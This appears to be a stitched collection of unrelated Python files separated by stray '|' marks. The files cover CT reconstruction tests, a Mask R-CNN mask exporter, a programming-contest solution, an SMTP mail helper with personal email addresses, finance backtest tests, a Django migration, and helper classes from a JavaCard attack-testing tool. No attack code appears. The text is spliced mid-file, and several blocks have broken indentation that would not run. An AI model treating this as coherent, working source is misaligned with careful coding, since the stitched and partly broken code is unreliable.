    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_2D(self):
        """Central-slice 2D reconstruction matches the 2D ground truth."""
        data2D = self.acq_data.get_slice(vertical='centre')
        img_data2D = self.img_data.get_slice(vertical='centre')

        reconstructor = FBP(data2D)
        reco = reconstructor.run(verbose=0)
        np.testing.assert_allclose(reco.as_array(), img_data2D.as_array(), atol=1e-3)

        reco2 = reco.copy()
        reco2.fill(0)
        reconstructor.run(out=reco2, verbose=0)
        np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_with_tigre(self):
        """With TIGRE's own ram-lak filter, CIL's FBP matches TIGRE's FBP."""
        fbp_tigre = FBP_tigre(self.ig, self.ag)
        reco_tigre = fbp_tigre(self.acq_data)

        #fbp CIL with TIGRE's filter
        reconstructor_cil = FBP(self.acq_data)
        n = 2**reconstructor_cil.fft_order
        # build TIGRE's ram-lak filter at the same length
        ramp = ramp_flat(n)
        filt = filter('ram_lak', ramp[0], n, 1, False)

        reconstructor_cil = FBP(self.acq_data)
        reconstructor_cil.set_filter(filt)
        reco_cil = reconstructor_cil.run(verbose=0)

        #with the same filter results should be virtually identical
        np.testing.assert_allclose(reco_cil.as_array(), reco_tigre.as_array(), atol=1e-8)

    @unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
    def test_results_inplace_filtering(self):
        """filter_inplace=True must visibly modify the input acquisition data."""
        reconstructor = FBP(self.acq_data)
        reco = reconstructor.run(verbose=0)

        data_filtered = self.acq_data.copy()
        reconstructor_inplace = FBP(data_filtered)
        reconstructor_inplace.set_filter_inplace(True)
        reconstructor_inplace.run(out=reco, verbose=0)

        diff = (data_filtered - self.acq_data).abs().mean()
        self.assertGreater(diff, 0.8)
import os
import sys
import itertools
import math
import logging
import json
import re
import random
from collections import OrderedDict
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.lines as lines
from matplotlib.patches import Polygon
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn import utils
from mrcnn import visualize
from mrcnn.config import Config
from mrcnn.visualize import display_images
import mrcnn.model as modellib
from mrcnn.model import log
import skimage
import cv2
############################################################
# Configurations
############################################################
class BalloonConfig(Config):
    """Configuration for training on the toy dataset.

    Derives from the base Config class and overrides some values.

    Fix: the class previously had no base class even though its docstring
    said it derives from Config, so none of these overrides took effect and
    the derived attributes (batch size, etc.) were never computed.
    """
    # Give the configuration a recognizable name
    NAME = "class"

    # We use a GPU with 12GB memory, which can fit two images.
    # Adjust down if you use a smaller GPU.
    IMAGES_PER_GPU = 1

    # Number of classes (including background)
    NUM_CLASSES = 1 + 4  # Background + the four labelled classes

    # Number of training steps per epoch
    STEPS_PER_EPOCH = 100

    # Skip detections with < 90% confidence
    DETECTION_MIN_CONFIDENCE = 0.9
############################################################
# Dataset
############################################################
class BalloonDataset(utils.Dataset):
    """Dataset of VIA-annotated images with four foreground classes.

    Despite the "balloon" naming, this loader registers four classes
    (named "1".."4") under the source name "class".
    """

    def load_balloon(self, dataset_dir, subset):
        """Load a subset of the Balloon dataset.
        dataset_dir: Root directory of the dataset.
        subset: Subset to load: train or val
        """
        # Register the four foreground classes under source "class".
        self.add_class("class", 1, "1")
        self.add_class("class", 2, "2")
        self.add_class("class", 3, "3")
        self.add_class("class", 4, "4")

        # Train or validation dataset?
        assert subset in ["train", "val", "test"]
        dataset_dir = os.path.join(dataset_dir, subset)

        # Load annotations
        # VGG Image Annotator (up to version 1.6) saves each image in the form:
        # { 'filename': '28503151_5b5b7ec140_b.jpg',
        #   'regions': {
        #       '0': {
        #           'region_attributes': {},
        #           'shape_attributes': {
        #               'all_points_x': [...],
        #               'all_points_y': [...],
        #               'name': 'polygon'}},
        #       ... more regions ...
        #   },
        #   'size': 100202
        # }
        # We mostly care about the x and y coordinates of each region
        # Note: In VIA 2.0, regions was changed from a dict to a list.
        annotations = json.load(open(os.path.join(dataset_dir, "via_export_json0413.json")))
        annotations = list(annotations.values())  # don't need the dict keys

        # The VIA tool saves images in the JSON even if they don't have any
        # annotations. Skip unannotated images.
        annotations = [a for a in annotations if a['regions']]

        # Add images
        for a in annotations:
            # Get the x, y coordinates of points of the polygons that make up
            # the outline of each object instance. These are stored in the
            # shape_attributes (see json format above).
            # The if condition is needed to support VIA versions 1.x and 2.x.
            if type(a['regions']) is dict:
                polygons = [r['shape_attributes'] for r in a['regions'].values()]
                objects = [s['region_attributes'] for s in a['regions'].values()]
                num_ids = [n['class'] for n in objects]
            else:
                polygons = [r['shape_attributes'] for r in a['regions']]
                objects = [s['region_attributes'] for s in a['regions']]
                num_ids = [n['class'] for n in objects]
            # NOTE(review): despite the name, num_ids holds the class-*name*
            # strings from the 'class' region attribute; they are mapped to
            # numeric ids later by get_class_id_from_class_name().

            # load_mask() needs the image size to convert polygons to masks.
            # Unfortunately, VIA doesn't include it in JSON, so we must read
            # the image. This is only managable since the dataset is tiny.
            image_path = os.path.join(dataset_dir, a['filename'])
            image = skimage.io.imread(image_path)
            height, width = image.shape[:2]
            filename = a['filename']
            self.add_image(
                "class",
                image_id=a['filename'],  # use file name as a unique image id
                path=image_path,
                width=width, height=height,
                polygons=polygons,
                num_ids=num_ids, filename=filename)

    def get_class_id_from_class_name(self, class_name):
        """Map a list of class-name strings to their numeric class ids,
        by linear search through self.class_info."""
        class_ids=[]
        for i in range(len(class_name)):
            for j in range(len(self.class_info)):
                if self.class_info[j]['name'] == class_name[i]:
                    id_name = self.class_info[j]['id']
                    class_ids.append(id_name)
        return class_ids

    def load_mask(self, image_id):
        """Generate instance masks for an image.
        Returns:
         masks: A uint8 array of shape [height, width, instance count] with
            one mask per instance; pixels inside a polygon are set to 255.
         class_ids: a 1D array of class IDs of the instance masks.
         filename: the source image file name (used by the export script).

        NOTE(review): the base utils.Dataset.load_mask contract is a
        (bool mask, class_ids) pair; the 255-valued mask and the extra
        filename return value suit the mask-export script in this file but
        would break stock mrcnn training code — confirm intended callers.
        """
        # If not a balloon dataset image, delegate to parent class.
        image_info = self.image_info[image_id]
        if image_info["source"] != "class":
            return super(self.__class__, self).load_mask(image_id)
        num_ids = image_info['num_ids']

        # Convert polygons to a bitmap mask of shape
        # [height, width, instance_count]
        info = self.image_info[image_id]
        filename = info['filename']
        mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
                        dtype=np.uint8)
        for i, p in enumerate(info["polygons"]):
            # Get indexes of pixels inside the polygon and set them to 255
            rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
            mask[rr, cc, i] = 255

        # map the stored class-name strings to numeric class ids
        class_ids=self.get_class_id_from_class_name(num_ids)
        return mask, np.array(class_ids, dtype=np.int32), filename
############################################################
# Generate load mask file
############################################################
if __name__ == '__main__':
    # Load dataset
    config = BalloonConfig()
    BALLOON_DIR = os.path.join(ROOT_DIR, "datasets/test")
    dataset = BalloonDataset()
    dataset.load_balloon(BALLOON_DIR, "val")
    # Create the output directory for the rendered mask images, if missing.
    if not(os.path.isdir(BALLOON_DIR + '/result')):
        os.makedirs(os.path.join(BALLOON_DIR + '/result'))
    # Must call before using the dataset
    dataset.prepare()
    print("Image Count: {}".format(len(dataset.image_ids)))
    print("Class Count: {}".format(dataset.num_classes))
    for i, info in enumerate(dataset.class_info):
        print("{:3}. {:50}".format(i, info['name']))
    # Load and save mask image
    image_ids = dataset.image_ids
    for image_id in image_ids:
        image = dataset.load_image(image_id)
        mask, class_ids, filename = dataset.load_mask(image_id)
        # Save the combined mask under the source image's base name, as PNG.
        filename = filename.split('.')[0] + '.png'
        print(class_ids)
        print(image_id)
        print(filename)
        # NOTE(review): mask_ is a *view* into mask, so the in-place += below
        # also mutates mask; overlapping instances can overflow uint8
        # (255 + 255 wraps) -- confirm whether instances may overlap.
        mask_ = mask[:,:,0]
        if len(class_ids) >= 1:
            for i in range(1,len(class_ids)):
                mask_ += mask[:,:,i]
        skimage.io.imsave(BALLOON_DIR + "/result/%s" %filename,mask_)
#cv2.imwrite(BALLOON_DIR + "/result/%s" %filename,mask_) |
# Rudigus - OBI 2018 - Senior level - Phase 1 - World Cup stickers
# Reads the album parameters (first line, unused beyond parsing), the list of
# missing stickers and the list of newly obtained stickers, then prints how
# many stickers are still missing.
n, c, m = input().split()
x = input().split()  # stickers still missing from the album
y = input().split()  # stickers just obtained
figurinhasFaltando = len(x)
for i in range(len(y)):
    for j in range(len(x)):
        if(y[i] == x[j]):
            figurinhasFaltando -= 1
            x[j] = -1  # consume this slot so it cannot be matched again
            # BUG FIX: each obtained sticker fills at most one missing slot;
            # without the break a duplicated entry in x was consumed twice.
            break
print(figurinhasFaltando)
|
# -*- coding:utf-8 -*-
__author__ = "jake"
__email__ = "jakejie@163.com"
"""
Project:StayOrder
FileName = PyCharm
Version:1.0
CreateDay:2018/10/20 9:52
"""
import smtplib
from email.header import Header
from email.mime.text import MIMEText
from email.utils import parseaddr, formataddr
try:
from . import config
except Exception as im_err:
try:
import config
except Exception as im_err:
print("sent_email 包导入错误:{}".format(im_err))
# Email sending helper
class SendEmail(object):
    """Compose and send a UTF-8 plain-text email via SMTP over SSL (port 465)."""
    # Outgoing mailbox settings, read from config at class-definition time
    email_server = config.EMAIL_HOST
    from_address = config.EMAIL_HOST_USER
    password = config.EMAIL_HOST_PASSWORD
    def __init__(self, text, sender, receiver, subject, address):
        # text: message body; sender/receiver: display names; subject: mail
        # subject; address: recipient email address
        self.text = text
        self.sender = sender
        self.receiver = receiver
        self.subject = subject
        self.address = address
        # NOTE(review): to_address duplicates address; both kept for compatibility
        self.to_address = address
        # Top to bottom: message body, sender display name, receiver display
        # name, and the mail subject
        self.msg = MIMEText(self.text, 'plain', 'utf-8')
        self.msg['From'] = self.format_address(self.sender + '<' + self.from_address + '>')
        self.msg['To'] = self.format_address(self.receiver + '<' + self.to_address + '>')
        self.msg['Subject'] = Header(self.subject, 'utf-8').encode()
    # Format a "Name <address>" string into an RFC 2047 encoded header value
    @staticmethod
    def format_address(s):
        name, address = parseaddr(s)
        return formataddr((Header(name, 'utf-8').encode(), address))
    def send(self):
        # Deliver the prepared message; failures are printed, never raised.
        try:
            # server = smtplib.SMTP(self.email_server, 25)  # 25 = plain SMTP, 465 = SSL
            server = smtplib.SMTP_SSL(self.email_server, 465)
            # server.starttls()  # required when using STARTTLS instead of SSL
            server.set_debuglevel(1)
            server.login(self.from_address, self.password)
            server.sendmail(self.from_address, [self.to_address], self.msg.as_string())
            server.quit()
        except Exception as email_err:
            print("邮件发送失败:{}".format(email_err))
if __name__ == '__main__':
    # Manual smoke test: send one test mail to each address in the list.
    # address_list = ["lucien33@live.com","rdvparis75015@gmail.com"]
    address_list = ['794564669@qq.com',]
    for add in address_list:
        # Arguments: body text, sender display name, receiver display name, subject, address
        send_email = SendEmail('这是一封测试邮件的中文内容', '这是来自RDV', '{}'.format(add), '恭喜 预约成功', add)
        send_email.send()
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from unittest.mock import patch
from pandas import date_range
from qf_lib.backtesting.alpha_model.exposure_enum import Exposure
from qf_lib.backtesting.signals.backtest_signals_register import BacktestSignalsRegister
from qf_lib.backtesting.signals.signal import Signal
from qf_lib.common.tickers.tickers import BloombergTicker
from qf_lib.common.utils.dateutils.relative_delta import RelativeDelta
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.dataframe.qf_dataframe import QFDataFrame
from qf_lib.containers.futures.future_tickers.bloomberg_future_ticker import BloombergFutureTicker
class TestSignalsRegister(unittest.TestCase):
    """Tests for BacktestSignalsRegister.get_signals()."""

    def test_get_signals__single_contract(self):
        """
        Save signals, which belong to one ticker (contract). The returned signals data frame should contain only one
        column, named after the ticker and used model.
        """
        ticker = BloombergTicker("Example Index")
        number_of_days = 30
        start_date = str_to_date("2000-01-01")
        end_date = start_date + RelativeDelta(days=number_of_days-1)
        signals_register = BacktestSignalsRegister()
        for date in date_range(start_date, end_date, freq="D"):
            signals_register.save_signals([Signal(ticker, Exposure.LONG, 0.0, 17, date)])
        signals_df = signals_register.get_signals()
        self.assertEqual(type(signals_df), QFDataFrame)
        self.assertEqual(signals_df.shape, (number_of_days, 1))

    def test_get_signals__multiple_tickers(self):
        """
        Save signals, which belong to multiple tickers.
        """
        tickers = [BloombergTicker("Example Index"), BloombergTicker("Example 2 Index")]
        number_of_days = 30
        start_date = str_to_date("2000-01-01")
        end_date = start_date + RelativeDelta(days=number_of_days - 1)
        signals_register = BacktestSignalsRegister()
        for date in date_range(start_date, end_date, freq="D"):
            signals_register.save_signals([Signal(ticker, Exposure.LONG, 0.0, 17, date) for ticker in tickers])
        signals_df = signals_register.get_signals()
        self.assertEqual(type(signals_df), QFDataFrame)
        self.assertEqual(signals_df.shape, (number_of_days, 2))

    def test_get_signals__one_ticker_multiple_signals(self):
        """
        Save signals belonging to one ticker. In this case, even if multiple different signals will be generated for
        one date, only one of them will be returned (always the first one).
        """
        ticker = BloombergTicker("Example Index")
        number_of_days = 30
        start_date = str_to_date("2000-01-01")
        end_date = start_date + RelativeDelta(days=number_of_days - 1)
        signals_register = BacktestSignalsRegister()
        for date in date_range(start_date, end_date, freq="D"):
            signals_register.save_signals([Signal(ticker, Exposure.LONG, 0.0, 17, date)])
            signals_register.save_signals([Signal(ticker, Exposure.SHORT, 0.0, 17, date)])
        signals_df = signals_register.get_signals()
        self.assertEqual(type(signals_df), QFDataFrame)
        self.assertEqual(signals_df.shape, (number_of_days, 1))
        # BUG FIX: DataFrame.iteritems() was removed in pandas 2.0;
        # DataFrame.items() is the equivalent and exists in all versions.
        for column, tms in signals_df.items():
            self.assertTrue(all(s.suggested_exposure == Exposure.LONG for s in tms))

    @patch.object(BloombergFutureTicker, "ticker")
    def test_get_signals__one_future_ticker(self, ticker_mock):
        """Save signals for a (mocked) future ticker; one column is expected."""
        fut_ticker_1 = BloombergFutureTicker("Ticker name", "family id", 1, 1)
        ticker_mock.return_value = "Specific ticker"
        number_of_days = 30
        start_date = str_to_date("2000-01-01")
        rolling_date = start_date + RelativeDelta(days=number_of_days - 1)
        signals_register = BacktestSignalsRegister()
        for date in date_range(start_date, rolling_date, freq="D"):
            signals_register.save_signals([Signal(fut_ticker_1, Exposure.LONG, 0.0, 17, date)])
        signals_df = signals_register.get_signals()
        self.assertEqual(type(signals_df), QFDataFrame)
        self.assertEqual(signals_df.shape, (number_of_days, 1))
|
# Generated by Django 3.1.5 on 2021-05-19 17:07
from django.db import migrations, models
class Migration(migrations.Migration):
    """Narrow 'despesa.repetir' to a 1-char choice field: Nunca/Mensalmente/Anualmente."""
    dependencies = [
        ('financeiro', '0012_auto_20210514_1913'),
    ]
    operations = [
        migrations.AlterField(
            model_name='despesa',
            name='repetir',
            field=models.CharField(choices=[('n', 'Nunca'), ('m', 'Mensalmente'), ('a', 'Anualmente')], max_length=1, verbose_name='Repetir'),
        ),
    ]
|
import unittest
class WorkSpaceTestCase(unittest.TestCase):
    """Tests for Workspace.add_custom_ignore_folder_to_entries."""

    def test_adding_custom_folder_to_ignore_files(self):
        """Extra ignore folders are appended after the existing entries."""
        from fandogh_cli.workspace import Workspace
        base_entries = ["folder{}".format(index) for index in range(5)]
        extra_folders = ["behrooz", "git", ".git"]
        merged = Workspace.add_custom_ignore_folder_to_entries(
            entries=base_entries, ignore_folders=extra_folders)
        self.assertEqual(merged, base_entries + extra_folders)

    def test_adding_custom_folder_when_they_already_in_files(self):
        """Duplicated ignore folders are appended only once, keeping order."""
        from fandogh_cli.workspace import Workspace
        base_entries = ["folder{}".format(index) for index in range(5)]
        extra_folders = ["behrooz", "git", ".git", "behrooz", "behrooz", "behrooz", "behrooz", "something"]
        deduplicated = list(dict.fromkeys(extra_folders))
        merged = Workspace.add_custom_ignore_folder_to_entries(
            entries=base_entries, ignore_folders=extra_folders)
        self.assertEqual(merged, base_entries + deduplicated)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/env python3
import argparse
import configparser
import enum
import logging
import os
import re
import subprocess
import sys
import time
from contextlib import contextmanager
import pathlib
import bson
# from collections import namedtuple
from typing import List, NamedTuple, Optional
import pymongo
from javus.settings import LIB_DIR
log = logging.getLogger(__file__)
handler = logging.StreamHandler()
formatter = logging.Formatter("%(levelname)s:%(asctime)s:%(name)s: %(message)s")
handler.setFormatter(formatter)
log.addHandler(handler)
# FIXME use enum and allow 'debug' as value for --verbose
LOG_LEVELS = [
logging.DEBUG,
logging.INFO,
logging.WARNING,
logging.ERROR,
logging.CRITICAL,
]
class Error(enum.Enum):
    # Error codes for fatal conditions (presumably used as process exit
    # codes -- TODO confirm against callers).
    UNSUPPORTED_PYTHON_VERSION = -1
class Timer(object):
    """Context manager measuring wall-clock time with ``time.time()``.

    After the ``with`` block exits, ``start``, ``end`` and ``duration``
    (seconds, float) are populated.
    """

    def __init__(self):
        # All three values stay None until the context manager runs.
        self.start = self.end = self.duration = None

    def __enter__(self, *args, **kwargs):
        self.start = time.time()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        self.end = time.time()
        self.duration = self.end - self.start
class CommandLineApp(object):
    """
    Template for Python command line applications.

    Subclasses override ``add_subparsers``/``add_options``/``run``; the
    constructor wires up argument parsing and the logging verbosity.
    """

    APP_DESCRIPTION = None

    def __init__(self):
        self.verbosity = logging.ERROR
        self.args = None
        self.parser = argparse.ArgumentParser(description=self.APP_DESCRIPTION,)
        self.add_subparsers()
        self.add_options()
        self.parse_options()
        self.setup_logging()

    def setup_logging(self, target_log=None):
        """Apply ``self.verbosity`` to ``target_log`` (module logger by default)."""
        if target_log is None:
            target_log = log
        old = logging.getLevelName(target_log.level)
        new = logging.getLevelName(self.verbosity)
        target_log.setLevel(self.verbosity)
        log.debug(
            "logging level for %s changed from %s to %s ", target_log.name, old, new
        )

    def add_subparsers(self):
        r"""
        Allows to add subparsers for parsing sub-commands. To be overriden
        by the subclasses
        """
        pass

    def add_options(self):
        """Register the options shared by every application (currently -v)."""
        levels = ", ".join([str(lvl) for lvl in LOG_LEVELS])
        self.parser.add_argument(
            "-v",
            "--verbose",
            help="Set the verbosity {" + levels + "}",
            type=self.validate_verbosity,
        )

    def validate_verbosity(self, value):
        """argparse ``type=`` hook: accept only integers listed in LOG_LEVELS."""
        # FIXME use enum.Enum - already in gppw.py
        try:
            value = int(value)
        except ValueError:
            raise argparse.ArgumentTypeError("verbosity is not an integer")
        if value not in LOG_LEVELS:
            raise argparse.ArgumentTypeError("verbosity level not from expected range")
        return value

    def parse_options(self):
        """Parse sys.argv and pick up the verbosity, if given."""
        self.args = self.parser.parse_args()
        if self.args.verbose is not None:
            self.verbosity = self.args.verbose

    def run(self):
        # BUG FIX: corrected typo in the error message ("bee" -> "been").
        raise NotImplementedError("The method 'run' has not been implemented!")
@contextmanager
def cd(new_path):
    """
    Context manager: chdir into ``new_path`` for the duration of the block,
    yielding the previous working directory, and chdir back on exit.

    kudos to:
    https://stackoverflow.com/questions/431684/how-do-i-change-the-working-directory-in-python/13197763#13197763
    """
    old_path = os.getcwd()
    log.debug("Save old path: %s", old_path)
    try:
        log.debug("Change directory to: %s", new_path)
        # yields the previous directory so callers can refer back to it
        os.chdir(new_path)
        yield old_path
    finally:
        # the old directory might also be removed in the meantime; there is no
        # good and logical thing to do in that case, so the exception from
        # os.chdir is allowed to propagate
        # FIXME Ceesjan taught to not to use format in logging!!!
        log.debug("Switch back to old path: %s", old_path)
        os.chdir(old_path)
# FIXME rename to load_sdks
# FIXME depends on external configuration
# TODO maybe just load them directly from the submodule and put it on SDKVersion
def load_versions(versions):
    """
    parses 'jc221,jc221' etc.
    returns the supported versions and orders them
    from newest to oldest

    :param versions: iterable of version strings; unknown ones are dropped
    """
    # The known versions come from lib/sdkversions.properties; their order in
    # that file is assumed to be oldest -> newest (TODO confirm).
    props = configparser.ConfigParser()
    props.read(LIB_DIR / "sdkversions.properties")
    known = list(props["SUPPORTED_VERSIONS"])
    # Keep only the requested versions that are actually supported.
    filtered = []
    for version in versions:
        if version in known:
            filtered.append(version)
    # sort the values based on the order of JC versions in sdkversions.properties
    filtered.sort(key=known.index)
    return filtered[::-1]
class JCVersion(NamedTuple):
    """JavaCard runtime version as reported by ``JCSystem.getVersion()``."""
    major: Optional[int]
    minor: Optional[int]

    @classmethod
    def from_str(cls, string: str) -> "JCVersion":
        r"""
        Build a JCVersion from the raw output of ``JCSystem.getVersion()``.

        The value is a ``short`` printed as (up to) four characters: the first
        two are the major version, the remainder the minor one. A component
        that cannot be parsed (e.g. from an empty string) becomes ``None``.

        param `string`: two bytes
        """
        def _int_or_none(text):
            try:
                return int(text)
            except ValueError:
                return None

        return cls(major=_int_or_none(string[:2]), minor=_int_or_none(string[2:]))

    def __str__(self) -> str:
        # NOTE: a missing component renders literally as 'None'
        return "%s.%s" % (self.major, self.minor)

    def get_sdks(self) -> List["SDKVersion"]:
        r"""
        Returns a list of sdks, that are worth trying for the specific card.
        """
        available_sdks = SDKVersion.get_available_sdks()
        if self.major is None:
            # be generous and return all the available SDKs
            return available_sdks
        usable = []
        for sdk in available_sdks:
            if sdk.major < self.major:
                usable.append(sdk)
            elif sdk.major == self.major and (self.minor is None or sdk.minor <= self.minor):
                # either we cannot compare minor versions or the SDK is old enough
                usable.append(sdk)
        return usable
class SDKVersion(NamedTuple):
    """Parsed JavaCard SDK identifier, e.g. ``jc221``, ``jc222u1``, ``jc310b43``."""
    major: int
    minor: int
    patch: int
    update: Optional[int]
    # TODO what is 'b' in jc310b43
    b_value: Optional[int]
    # the original string, that was parsed to separate values
    raw: str

    @classmethod
    def from_str(cls, string: str) -> "SDKVersion":
        """Parse a single SDK version string (case-insensitive).

        Returns ``None`` when the string does not match the expected format;
        this silent behaviour is kept for backward compatibility.
        """
        string = string.strip().lower()
        # fmt: off
        sdk_regex = re.compile(
            r"((?P<header>jc)"
            r"(?P<major>\d)"
            r"(?P<minor>\d)"
            r"(?P<patch>\d)"
            r"((?P<type>[ub]?)"
            r"(?P<type_value>\d+))?)"
        )
        # fmt: on
        match = sdk_regex.match(string)
        if match is None:
            return None
        update = None
        b_value = None
        # The optional suffix is either an update ('u1') or a build ('b43').
        if match.group("type") == "u":
            update = int(match.group("type_value"))
        elif match.group("type") == "b":
            b_value = int(match.group("type_value"))
        return cls(
            major=int(match.group("major")),
            minor=int(match.group("minor")),
            patch=int(match.group("patch")),
            update=update,
            b_value=b_value,
            raw=string,
        )

    @classmethod
    def from_list(cls, string: str, sep: str = ",") -> List["SDKVersion"]:
        """Parse a separated list such as ``"jc221,jc222"``."""
        return [cls.from_str(part.strip()) for part in string.split(sep=sep)]

    def __str__(self) -> str:
        return self.raw

    def __repr__(self) -> str:
        return self.raw

    # TODO load only once and get them from the class afterwards
    @classmethod
    def get_available_sdks(cls) -> List["SDKVersion"]:
        """Load the supported SDK versions from lib/sdkversions.properties."""
        properties = configparser.ConfigParser()
        properties.read(LIB_DIR / "sdkversions.properties")
        return [cls.from_str(version) for version in properties["SUPPORTED_VERSIONS"]]

    # TODO missing other comparison methods
    def __eq__(self, other) -> bool:
        """Compare version components only; ``raw`` is deliberately ignored."""
        return (self.major, self.minor, self.patch, self.update, self.b_value) == \
               (other.major, other.minor, other.patch, other.update, other.b_value)

    # BUG FIX: defining __eq__ implicitly set __hash__ to None, which made
    # SDKVersion instances unhashable (unusable in sets / as dict keys).
    # Restore hashing consistent with __eq__ (raw excluded).
    def __hash__(self) -> int:
        return hash((self.major, self.minor, self.patch, self.update, self.b_value))
class AID:
    """Application IDentifier: a 5-byte RID followed by a 0-11 byte PIX."""

    def __init__(self, string: str = "", rid: bytes = None, pix: bytes = None):
        """Build an AID either from a full hex ``string`` or from rid/pix parts.

        :param string: full AID as a hex string (takes precedence when non-empty)
        :param rid: 5-byte RID, as bytes or hex string
        :param pix: 0-11 byte PIX, as bytes or hex string (defaults to empty)
        :raises ValueError: malformed string, or neither string nor rid given
        :raises TypeError: rid/pix of an unsupported type
        """
        if string:
            aid = bytes.fromhex(string)
            rid = aid[:5]
            if len(rid) != 5:
                raise ValueError("RID from '%s' is not 5 bytes long" % string)
            pix = aid[5:]
            if not (0 <= len(pix) <= 11):
                raise ValueError("PIX length from '%s' is not 0-11 bytes long" % string)
            self.rid = rid
            self.pix = pix
        else:
            # BUG FIX: previously a missing/unsupported rid left self.rid unset,
            # producing a half-initialised object that failed only later with
            # an AttributeError; fail fast instead.
            if rid is None:
                raise ValueError("either 'string' or 'rid' must be provided")
            if isinstance(rid, str):
                self.rid = bytes.fromhex(rid)
            elif isinstance(rid, bytes):
                self.rid = rid
            else:
                raise TypeError("'rid' must be str or bytes")
            if pix is None:
                self.pix = bytes()
            elif isinstance(pix, str):
                self.pix = bytes.fromhex(pix)
            elif isinstance(pix, bytes):
                self.pix = pix
            else:
                raise TypeError("'pix' must be str or bytes")

    @property
    def aid(self):
        """The full AID (RID + PIX) as bytes."""
        return self.rid + self.pix

    def increase(self):
        r"""Increases `self.rid` by one each time"""
        byteorder = "big"
        rid_len = 5
        rid_as_int = int.from_bytes(self.rid, byteorder) + 1
        self.rid = rid_as_int.to_bytes(rid_len, byteorder)

    def __eq__(self, other):
        if isinstance(other, bytes):
            return self.aid == other
        elif isinstance(other, self.__class__):
            return self.aid == other.aid
        # Let Python try the reflected comparison for unknown types.
        return NotImplemented

    # Defining __eq__ removed the default hash; restore one consistent with
    # __eq__ (hash of the raw AID bytes, so it also matches equal bytes objects).
    def __hash__(self):
        return hash(self.aid)

    def __str__(self):
        return self.aid.hex().upper()
# ISO 7816 status words (SW1SW2 as an uppercase hex string) mapped to a
# human-readable note and the corresponding javacard.framework.ISO7816
# constant name.
JC_FRAMEWORK_ISO7816 = {
    "6999": {"note": "Applet selection failed", "const": "SW_APPLET_SELECT_FAILED",},
    "6100": {"note": "Response bytes remaining", "const": "SW_BYTES_REMAINING_00",},
    "6E00": {"note": "CLA value not supported", "const": "SW_CLA_NOT_SUPPORTED",},
    "6884": {
        "note": "Command chaining not supported",
        "const": "SW_COMMAND_CHAINING_NOT_SUPPORTED",
    },
    "6986": {
        "note": "Command not allowed (no current EF)",
        "const": "SW_COMMAND_NOT_ALLOWED",
    },
    "6985": {
        "note": "Conditions of use not satisfied",
        "const": "SW_CONDITIONS_NOT_SATISFIED",
    },
    "6C00": {"note": "Correct Expected Length (Le)", "const": "SW_CORRECT_LENGTH_00",},
    "6984": {"note": "Data invalid", "const": "SW_DATA_INVALID",},
    "6A84": {"note": "Not enough memory space in the file", "const": "SW_FILE_FULL",},
    "6983": {"note": "File invalid", "const": "SW_FILE_INVALID",},
    "6A82": {"note": "File not found", "const": "SW_FILE_NOT_FOUND",},
    "6A81": {"note": "Function not supported", "const": "SW_FUNC_NOT_SUPPORTED",},
    "6A86": {"note": "Incorrect parameters (P1,P2)", "const": "SW_INCORRECT_P1P2",},
    "6D00": {"note": "INS value not supported", "const": "SW_INS_NOT_SUPPORTED",},
    "6883": {
        "note": "Last command in chain expected",
        "const": "SW_LAST_COMMAND_EXPECTED",
    },
    "6881": {
        "note": "Card does not support the operation on the specified logical channel",
        "const": "SW_LOGICAL_CHANNEL_NOT_SUPPORTED",
    },
    "9000": {"note": "No Error", "const": "SW_NO_ERROR",},
    "6A83": {"note": "Record not found", "const": "SW_RECORD_NOT_FOUND",},
    "6882": {
        "note": "Card does not support secure messaging",
        "const": "SW_SECURE_MESSAGING_NOT_SUPPORTED",
    },
    "6982": {
        "note": "Security condition not satisfied",
        "const": "SW_SECURITY_STATUS_NOT_SATISFIED",
    },
    "6F00": {"note": "No precise diagnosis", "const": "SW_UNKNOWN",},
    "6200": {
        "note": "Warning, card state unchanged",
        "const": "SW_WARNING_STATE_UNCHANGED",
    },
    "6A80": {"note": "Wrong data", "const": "SW_WRONG_DATA",},
    "6700": {"note": "Wrong length", "const": "SW_WRONG_LENGTH",},
    "6B00": {"note": "Incorrect parameters (P1,P2)", "const": "SW_WRONG_P1P2",},
}
class RequestAPDU:
    # NOTE(review): despite the name, the fields (data, SW1, SW2) look like a
    # *response* APDU -- confirm intended role before extending.
    def __init__(self, string: str):
        # NOTE(review): ``string`` is currently ignored; no parsing is done and
        # all fields are initialised to None.
        self.data = None
        self.SW1 = None
        self.SW2 = None
    def success(self):
        # NOTE(review): stub -- presumably meant to check SW1/SW2 == 0x9000.
        pass
class CommandAPDU:
    """Container for the fields of an ISO 7816-4 command APDU.

    BUG FIX: the constructor assigned ``cla``, ``ins``, ... while those
    parameters were commented out, so every instantiation raised NameError.
    The parameters are restored with ``None`` defaults; the original
    ``string`` parameter is kept first for backward compatibility.
    """

    def __init__(
        self,
        string: str = "",
        cla=None,
        ins=None,
        p1=None,
        p2=None,
        lc=None,
        data=None,
        le=None,
    ):
        # TODO parse ``string`` into the individual fields when provided
        self.CLA = cla
        self.INS = ins
        self.P1 = p1
        self.P2 = p2
        self.Lc = lc
        self.data = data
        self.Le = le
class AttackConfigParser(configparser.ConfigParser):
    """ConfigParser with helpers for comma-separated list options."""

    def getlist(self, section: str, option: str, *args, sep=",", **kwargs) -> List[str]:
        """Return the option split on ``sep``, stripped, empty pieces dropped."""
